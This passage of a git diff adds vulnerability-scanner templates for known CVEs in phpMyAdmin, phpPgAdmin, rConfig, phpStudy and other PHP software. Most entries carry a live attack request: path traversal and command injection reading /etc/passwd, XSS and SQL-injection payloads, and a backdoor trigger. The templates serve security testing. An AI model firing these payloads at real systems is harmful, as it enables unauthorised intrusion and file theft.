2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + regex: + - 'root:.*:0:0:' + matchers-condition: and + raw: + - | + POST /scripts/setup.php HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Content-Type: application/x-www-form-urlencoded + + action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} diff --git a/config/51pwn/yaml/phpMyAdmin/CVE-2018-12613.yaml b/config/51pwn/yaml/phpMyAdmin/CVE-2018-12613.yaml new file mode 100755 index 000000000..3c13755f6 --- /dev/null +++ b/config/51pwn/yaml/phpMyAdmin/CVE-2018-12613.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-12613 +info: + name: PhpMyAdmin 4.8.1 Remote File Inclusion + author: + - l0ne1y + description: |- + phpMyAdmin 文件包含漏洞 + phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 + + phpMyAdmin 4.8.2之前的4.8.x版本中存在安全漏洞。攻击者可利用该漏洞包含(查看并可能执行)服务器上的文件。 + severity: high + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://www.phpmyadmin.net/security/PMASA-2018-4/ + + 临时修复方案: + 1、PHP 中使用 open_basedir 配置限制访问在指定的区域,路径长短截断 + 2、过滤.(点)/(反斜杠)\\(反斜杠),编码绕过 + 3、禁止服务器远程文件包含 + 4、对于限制了包含文件后缀的情况,PHP版本小于5.3,php.ini magic_quotes_gpc = off,对可控参数未使用addslashes函数,满足这三个条件就可以使用%00截断。 + 5、问号、井号、空格绕过(远程) +requests: +- matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd' + method: GET diff --git a/config/51pwn/yaml/phpMyAdmin/CVE-2019-12616.yaml b/config/51pwn/yaml/phpMyAdmin/CVE-2019-12616.yaml new file mode 100755 index 000000000..40c9b8c88 --- /dev/null +++ b/config/51pwn/yaml/phpMyAdmin/CVE-2019-12616.yaml @@ -0,0 +1,38 @@ +id: CVE-2019-12616 +info: + name: phpMyAdmin CSRF + author: + - l0ne1y + description: |- + phpMyAdmin 跨站请求伪造(CSRF)漏洞 + phpMyAdmin是phpMyAdmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 + + phpMyAdmin 4.9.0之前版本中存在跨站请求伪造漏洞。该漏洞源于WEB应用未充分验证请求是否来自可信用户。攻击者可利用该漏洞通过受影响客户端向服务器发送非预期的请求。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://www.phpmyadmin.net/security/PMASA-2019-4/ + + 临时修复方案: + 1、令牌同步模式
令牌同步模式(英语:Synchronizer token pattern,简称STP)。原理是:当用户发送请求时,服务器端应用将令牌(英语:token,一个保密且唯一的值)嵌入HTML表格,并发送给客户端。客户端提交HTML表格时候,会将令牌发送到服务端,令牌的验证是由服务端实行的。令牌可以通过任何方式生成,只要确保随机性和唯一性(如:使用随机种子【英语:random seed】的哈希链 )。这样确保攻击者发送请求时候,由于没有该令牌则无法通过验证。 + 2、检查Referer字段
HTTP头中有一个Referer字段,这个字段用以标明请求来源于哪个地址。在处理敏感数据请求时,通常来说,Referer字段应和请求的地址位于同一域名下。以银行操作为例,Referer字段地址通常应该是转账按钮所在的网页地址,应该也位于www.examplebank.com之下。而如果是CSRF攻击传来的请求,Referer字段会是包含恶意网址的地址,不会位于www.examplebank.com之下,这时候服务器就能识别出恶意的访问。这种办法简单易行,工作量低,仅需要在关键访问处增加一步校验。但这种办法也有其局限性,因其完全依赖浏览器发送正确的Referer字段。虽然http协议对此字段的内容有明确的规定,但并无法保证来访的浏览器的具体实现,亦无法保证浏览器没有安全漏洞影响到此字段。并且也存在攻击者攻击某些浏览器,篡改其Referer字段的可能。 + 3、添加校验token
由于CSRF的本质在于攻击者欺骗用户去访问自己设置的地址,所以如果要求在访问敏感数据请求时,要求用户浏览器提供不保存在cookie中,并且攻击者无法伪造的数据作为校验,那么攻击者就无法再运行CSRF攻击。这种数据通常是窗体中的一个数据项。服务器将其生成并附加在窗体中,其内容是一个伪随机数。当客户端通过窗体提交请求时,这个伪随机数也一并提交上去以供校验。正常的访问时,客户端浏览器能够正确得到并传回这个伪随机数,而通过CSRF传来的欺骗性攻击中,攻击者无从事先得知这个伪随机数的值,服务端就会因为校验token的值为空或者错误,拒绝这个可疑请求。 +requests: +- matchers: + - type: word + condition: or + words: + - phpmyadmin.net + - phpMyAdmin + - type: regex + regex: + - v=[1-4]\.[0-8]\. + - type: status + status: + - 200 + - 401 + matchers-condition: and + path: + - '{{BaseURL}}/phpmyadmin/' + method: GET diff --git a/config/51pwn/yaml/phpMyAdmin/CVE-2022-23808.yaml b/config/51pwn/yaml/phpMyAdmin/CVE-2022-23808.yaml new file mode 100755 index 000000000..19f37d5e5 --- /dev/null +++ b/config/51pwn/yaml/phpMyAdmin/CVE-2022-23808.yaml @@ -0,0 +1,40 @@ +id: CVE-2022-23808 +info: + name: phpMyAdmin < 5.1.2 - Cross-Site Scripting + author: + - l0ne1y + description: |- + phpMyAdmin 跨站脚本漏洞 + phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 + + phpMyAdmin 存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://www.phpmyadmin.net/security/PMASA-2022-2/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '">' + -

Add a new server

+ - phpMyAdmin setup + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/phpMyAdmin/phpmyadmin-misconfiguration.yaml b/config/51pwn/yaml/phpMyAdmin/phpmyadmin-misconfiguration.yaml new file mode 100755 index 000000000..9ed9e2f29 --- /dev/null +++ b/config/51pwn/yaml/phpMyAdmin/phpmyadmin-misconfiguration.yaml @@ -0,0 +1,36 @@ +id: phpmyadmin-misconfiguration +info: + name: phpmyadmin Data Exposure + author: + - l0ne1y + description: |- + phpMyAdmin 未授权访问漏洞 + + phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 + + phpMyAdmin 存在导入页面未授权访问漏洞。攻击者可利用该漏洞获取数据库配置。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.phpmyadmin.net/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 +requests: +- matchers: + - type: word + condition: and + words: + - var db = 'information_schema'; + - var opendb_url = 'db_structure.php'; + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/phpmyadmin/index.php?db=information_schema' + - '{{BaseURL}}/phpMyAdmin/index.php?db=information_schema' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/phpMyAdmin/phpmyadmin-setup.yaml b/config/51pwn/yaml/phpMyAdmin/phpmyadmin-setup.yaml new file mode 100755 index 000000000..f5769a1f8 --- /dev/null +++ b/config/51pwn/yaml/phpMyAdmin/phpmyadmin-setup.yaml @@ -0,0 +1,44 @@ +id: phpmyadmin-setup +info: + name: Publicly Accessible Phpmyadmin Setup + author: + - l0ne1y + description: |- + phpMyAdmin 设置页面未授权访问漏洞 + + phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 + + phpMyAdmin 存在导入页面未授权访问漏洞。攻击者可利用该漏洞对phpMyAdmin进行配置。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.phpmyadmin.net/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 +requests: +- matchers: + - type: word + condition: or + words: + - You want to configure phpMyAdmin using web interface + - <title>phpMyAdmin setup + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/phpmyadmin/scripts/setup.php' + - '{{BaseURL}}/_phpmyadmin/scripts/setup.php' + - '{{BaseURL}}/forum/phpmyadmin/scripts/setup.php' + - '{{BaseURL}}/php/phpmyadmin/scripts/setup.php' + - '{{BaseURL}}/typo3/phpmyadmin/scripts/setup.php' + - '{{BaseURL}}/web/phpmyadmin/scripts/setup.php' + - '{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php' + - '{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php' + - '{{BaseURL}}/phpmyadmin/setup/index.php' + - '{{BaseURL}}/pma/setup/index.php' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/phpMyAdmin/pma-server-import.yaml b/config/51pwn/yaml/phpMyAdmin/pma-server-import.yaml new file mode 100755 index 000000000..418b77e9b --- /dev/null +++ b/config/51pwn/yaml/phpMyAdmin/pma-server-import.yaml @@ -0,0 +1,44 @@ +id: pma-server-import +info: + name: PhpMyAdmin Server Import + author: + - l0ne1y + description: |- + phpMyAdmin 导入页面未授权访问漏洞 + + phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 + + phpMyAdmin 存在导入页面未授权访问漏洞。攻击者可利用该漏洞覆盖数据库数据。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.phpmyadmin.net/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 +requests: +- matchers: + - type: word + condition: and + words: + - File to import + - Location of the text file + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/pma/server_import.php' + - '{{BaseURL}}/phpmyadmin/server_import.php' + - '{{BaseURL}}/phpMyAdmin 2/server_import.php' + - '{{BaseURL}}/db/server_import.php' + - '{{BaseURL}}/server_import.php' + - '{{BaseURL}}/PMA/server_import.php' + - '{{BaseURL}}/admin/server_import.php' + - '{{BaseURL}}/admin/pma/server_import.php' + - '{{BaseURL}}/phpMyAdmin/server_import.php' + - '{{BaseURL}}/admin/phpMyAdmin/server_import.php' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/phpMyChat-Plus/CVE-2019-19908.yaml b/config/51pwn/yaml/phpMyChat-Plus/CVE-2019-19908.yaml new file mode 100755 index 000000000..c2b2f1928 --- /dev/null +++ b/config/51pwn/yaml/phpMyChat-Plus/CVE-2019-19908.yaml @@ -0,0 +1,31 @@ +id: CVE-2019-19908 +info: + name: phpMyChat-Plus - Cross-Site Scripting + author: + - madrobot + description: |- + phpMyChat-Plus pass_reset.php 跨站脚本漏洞 + phpMyChat-Plus是一套基于PHP和MySQL的聊天室系统。 + + phpMyChat-Plus 1.98版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/phpMyChat-Plus + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - + matchers-condition: and + path: + - '{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C' + method: GET diff --git a/config/51pwn/yaml/phpPgAdmin/CVE-2007-5728.yaml b/config/51pwn/yaml/phpPgAdmin/CVE-2007-5728.yaml new file mode 100755 index 000000000..ea23f4e95 --- /dev/null +++ b/config/51pwn/yaml/phpPgAdmin/CVE-2007-5728.yaml @@ -0,0 +1,32 @@ +id: CVE-2007-5728 +info: + name: phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting + author: + - l0ne1y + description: |- + phpPgAdmin 跨站脚本攻击漏洞 + phpPgAdmin 3.5中存在跨站脚本攻击漏洞。远程攻击者可以借助(1) redirect.php, 和(2) login.php的PHP_SELF中某些可用的输入信息,注入任意web脚本或HTML。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/phppgadmin/phppgadmin + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + words: + - + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test' + method: GET diff --git a/config/51pwn/yaml/phpPgAdmin/CVE-2008-5587.yaml b/config/51pwn/yaml/phpPgAdmin/CVE-2008-5587.yaml new file mode 100755 index 000000000..1836fb636 --- /dev/null +++ b/config/51pwn/yaml/phpPgAdmin/CVE-2008-5587.yaml @@ -0,0 +1,34 @@ +id: CVE-2008-5587 +info: + name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion + author: + - l0ne1y + description: |- + phpPgAdmin 本地文件包含漏洞 + phpPgAdmin是一个应用软件。用于 postgresql 的首要基于 Web 的管理工具。 + + phpPgAdmin 4.2.1及其早期版本的libraries/lib.inc.php中存在目录遍历漏洞,当 register_globals被激活时,远程攻击者可以借助对index.php的_language参数中的".."读取任意文件,可能导致上传任意文件并执行任意PHP代码。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/phppgadmin/phppgadmin + + 临时修复方案: + 1、PHP 中使用 open_basedir 配置限制访问在指定的区域,路径长短截断 + 2、过滤.(点)/(反斜杠)\\(反斜杠),编码绕过 + 3、禁止服务器远程文件包含 + 4、对于限制了包含文件后缀的情况,PHP版本小于5.3,php.ini magic_quotes_gpc = off,对可控参数未使用addslashes函数,满足这三个条件就可以使用%00截断。 + 5、问号、井号、空格绕过(远程) +requests: +- matchers: + - type: regex + regex: + - root:[x*]:0:0 + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' + method: GET diff --git a/config/51pwn/yaml/phpShowtime/CVE-2012-0981.yaml b/config/51pwn/yaml/phpShowtime/CVE-2012-0981.yaml new file mode 100755 index 000000000..a46c27bb7 --- /dev/null +++ b/config/51pwn/yaml/phpShowtime/CVE-2012-0981.yaml @@ -0,0 +1,32 @@ +id: CVE-2012-0981 +info: + name: phpShowtime 2.0 - Directory Traversal + author: + - l0ne1y + description: |- + phpShowtime 任意文件读取漏洞 + phpShowtime存在文件读取漏洞,因为它未能充分对用户提交的输入数据做充分的验证。成功利用此漏洞,可能允许攻击者获得敏感信息,这可能有助于进一步的攻击。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://phpshowtime.kybernetika.de/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/index.php?r=i/../../../../../etc/passwd' + method: GET diff --git a/config/51pwn/yaml/phpfastcache/CVE-2021-37704.yaml b/config/51pwn/yaml/phpfastcache/CVE-2021-37704.yaml new file mode 100755 index 000000000..53024f6b8 --- /dev/null +++ b/config/51pwn/yaml/phpfastcache/CVE-2021-37704.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-37704 +info: + name: phpinfo Resource Exposure + author: + - whoever + description: |- + phpfastcache 信息泄露漏洞 + phpfastcache是一套后端缓存系统。 + + PhpFastCache存在信息泄露漏洞,该漏洞源于软件对于\"vendor\"目录缺乏有效的访问保护,导致攻击者可以访问\"phpinfo()\"。 + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。 + /~https://github.com/PHPSocialNetwork/phpfastcache/security/advisories/GHSA-cvh5-p6r6-g2qc + + 临时修复方案:
1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
2、将敏感信息进行加密存储,非必要不可发送前端
3、发送敏感信息时需加密传输,如有必要需脱敏处理
4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
令、会话标识jsessionid等), 防止敏感信息泄漏。
6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: word + condition: and + words: + - PHP Extension + - PHP Version + - type: status + status: + - 200 + extractors: + - type: regex + regex: + - '>PHP Version <\/td>([0-9.]+)' + group: 1 + part: body + matchers-condition: and + path: + - '{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php' + - '{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php' + method: GET diff --git a/config/51pwn/yaml/phpstudy/phpstudy-backdoor-rce.yaml b/config/51pwn/yaml/phpstudy/phpstudy-backdoor-rce.yaml new file mode 100755 index 000000000..c00c5de52 --- /dev/null +++ b/config/51pwn/yaml/phpstudy/phpstudy-backdoor-rce.yaml @@ -0,0 +1,33 @@ +id: phpstudy-backdoor-rce +info: + name: phpstudy-backdoor-rce + author: + - l0ne1y + description: |- + phpstudy后门远程代码执行漏洞 + PhpStudy2016版本中的php5.4版本存被篡改添加后门导致远程代码执行 + reference: + - https://www.freebuf.com/column/214946.html + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.xp.cn/ + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 +requests: +- matchers: + - type: word + part: body + words: + - '{{verify}}' + path: + - '{{BaseURL}}/index.php' + method: GET + headers: + Accept-Charset: '{{payload}}' + Accept-Encoding: gzip,deflate +variables: + payload: '{{base64(verify)}}' + verify: rand_text_alpha(16, "abc") diff --git a/config/51pwn/yaml/rConfig/CVE-2019-16662.yaml b/config/51pwn/yaml/rConfig/CVE-2019-16662.yaml new file mode 100755 index 000000000..11e2f0d7f --- /dev/null +++ b/config/51pwn/yaml/rConfig/CVE-2019-16662.yaml @@ -0,0 +1,44 @@ +id: CVE-2019-16662 +info: + name: rConfig 3.9.2 Remote Code Execution + author: + - l0ne1y + tags: + - cve + - cve2019 + - rce + - intrusive + - rconfig + description: |- + rConfig 操作系统命令注入漏洞 + rConfig是一款开源的网络配置管理实用程序。 + + rConfig 3.9.2版本中存在安全漏洞,该漏洞源于‘rootUname’参数未经过滤便直接发送到‘exec’函数中。攻击者可利用该漏洞执行系统命令。 + reference: + - https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ + - https://nvd.nist.gov/vuln/detail/cve-2019-16662 + - https://drive.google.com/open?id=1oxi5cnuwwqc6y-7bgncfyhgfpk2cpvnu + severity: critical + classification: + cve-id: + - cve-2019-16662 + cwe-id: + - cwe-78 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://rconfig.com +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + regex: + - 'root:.*:0:0:' + matchers-condition: and + path: + - '{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23' + method: GET diff --git a/config/51pwn/yaml/rConfig/CVE-2020-10546.yaml b/config/51pwn/yaml/rConfig/CVE-2020-10546.yaml new file mode 100755 index 000000000..53b01e874 --- /dev/null +++ b/config/51pwn/yaml/rConfig/CVE-2020-10546.yaml @@ -0,0 +1,44 @@ +id: CVE-2020-10546 +info: + name: rConfig 3.9.4 SQL Injection + author: + - l0ne1y + tags: + - cve + - cve2020 + - rconfig + - sqli + description: |- + rConfig before 3.9.4 compliancepolicies.inc.php SQL注入漏洞 + rConfig是一款开源的网络配置管理实用程序。 + rConfig 3.9.4及之前版本中存在SQL注入漏洞,该漏洞源于程序以明文形式存储节点密码。攻击者可利用该漏洞访问被监听的网络设备。 + reference: + - /~https://github.com/theguly/exploits/blob/master/cve-2020-10546.py + - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/cve-2020-10546 + severity: critical + classification: + cve-id: + - cve-2020-10546 + cwe-id: + - cwe-89 + - cwe-522 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + remediation: |- + 官方修复方案: + 1.目前厂商已发布升级补丁以修复漏洞,详情请关注厂商主页: + https://www.rconfig.com/ +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '[project-discovery]' + matchers-condition: and + path: + - '{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani''+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+' + method: GET diff --git a/config/51pwn/yaml/rConfig/CVE-2020-10547.yaml b/config/51pwn/yaml/rConfig/CVE-2020-10547.yaml new file mode 100755 index 000000000..837b73caf --- /dev/null +++ b/config/51pwn/yaml/rConfig/CVE-2020-10547.yaml @@ -0,0 +1,44 @@ +id: CVE-2020-10547 +info: + name: rConfig 3.9.4 SQL Injection + author: + - l0ne1y + tags: + - cve + - cve2020 + - rconfig + - sqli + description: |- + rConfig before 3.9.4 compliancepolicyelements.inc.php SQL注入漏洞 + rConfig是一款开源的网络配置管理实用程序。 + rConfig 3.9.4及之前版本中存在SQL注入漏洞,该漏洞源于程序以明文形式存储节点密码。攻击者可利用该漏洞访问被监听的网络设备。 + reference: + - /~https://github.com/theguly/exploits/blob/master/cve-2020-10547.py https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ + - /~https://github.com/theguly/exploits/blob/master/cve-2020-10547.py + - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ + severity: critical + classification: + cve-id: + - cve-2020-10547 + cwe-id: + - cwe-89 + - cwe-522 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + remediation: |- + 官方修复方案: + 1.目前厂商已发布升级补丁以修复漏洞,详情请关注厂商主页: + https://www.rconfig.com/ +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '[project-discovery]' + matchers-condition: and + path: + - '{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani''+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains' + method: GET diff --git a/config/51pwn/yaml/rConfig/CVE-2020-10548.yaml b/config/51pwn/yaml/rConfig/CVE-2020-10548.yaml new file mode 100755 index 000000000..71c65e608 --- /dev/null +++ b/config/51pwn/yaml/rConfig/CVE-2020-10548.yaml @@ -0,0 +1,42 @@ +id: CVE-2020-10548 +info: + name: rConfig 3.9.4 - SQL Injection + author: + - l0ne1y + tags: + - cve + - cve2020 + - rconfig + - sqli + description: "rConfig before 3.9.4 devices.inc.php SQL注入漏洞 \nrConfig是一款开源的网络配置管理实用程序。\n\nrConfig + 3.9.4及之前版本中存在SQL注入漏洞,该漏洞源于程序以明文形式存储节点密码。攻击者可利用该漏洞访问被监听的网络设备。" + reference: + - /~https://github.com/theguly/exploits/blob/master/cve-2020-10548.py + - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/cve-2020-10548 + severity: critical + classification: + cve-id: + - cve-2020-10548 + cwe-id: + - cwe-89 + - cwe-522 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + remediation: |- + 官方修复方案: + 1.目前厂商已发布升级补丁以修复漏洞,详情请关注厂商主页: + https://www.rconfig.com/ +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '[project-discovery]' + matchers-condition: and + path: + - '{{BaseURL}}/devices.inc.php?search=True&searchField=antani''+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains' + method: GET diff --git a/config/51pwn/yaml/rConfig/CVE-2020-10549.yaml b/config/51pwn/yaml/rConfig/CVE-2020-10549.yaml new file mode 100755 index 000000000..d6256f175 --- /dev/null +++ b/config/51pwn/yaml/rConfig/CVE-2020-10549.yaml @@ -0,0 +1,45 @@ +id: CVE-2020-10549 +info: + name: rConfig <=3.9.4 - SQL Injection + author: + - l0ne1y + tags: + - cve + - cve2020 + - rconfig + - sqli + description: |- + rConfig before 3.9.4 snippets.inc.php SQL注入漏洞 + rConfig是一款开源的网络配置管理实用程序。 + + rConfig 3.9.4及之前版本中存在SQL注入漏洞,该漏洞源于程序以明文形式存储节点密码。攻击者可利用该漏洞访问被监听的网络设备。 + reference: + - /~https://github.com/theguly/exploits/blob/master/cve-2020-10549.py + - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/cve-2020-10549 + severity: critical + classification: + cve-id: + - cve-2020-10549 + cwe-id: + - cwe-89 + - cwe-522 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + remediation: |- + 官方修复方案: + 1.目前厂商已发布升级补丁以修复漏洞,详情请关注厂商主页: + https://www.rconfig.com/ +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '[project-discovery]' + matchers-condition: and + path: + - '{{BaseURL}}/snippets.inc.php?search=True&searchField=antani''+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains' + method: GET diff --git a/config/51pwn/yaml/rConfig/CVE-2020-13638.yaml b/config/51pwn/yaml/rConfig/CVE-2020-13638.yaml new file mode 100755 index 000000000..88ff9801d --- /dev/null +++ b/config/51pwn/yaml/rConfig/CVE-2020-13638.yaml @@ -0,0 +1,68 @@ +id: CVE-2020-13638 +info: + name: rConfig 3.9.5 - Remote Code Execution + author: + - l0ne1y + tags: + - rconfig + - rce + description: |- + rConfig 身份验证绕过导致任意创建管理员账户漏洞 + rConfig是一款开源的网络配置管理实用程序。 + + rConfig 3.9.x系列3.9.7之前版本存在安全漏洞,该漏洞源于lib/crud/userprocess.php存在身份验证绕过,导致创建管理员帐户。 + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.5.zip + - https://www.exploit-db.com/exploits/48878 + severity: high + remediation: |- + 官方修复方案: + 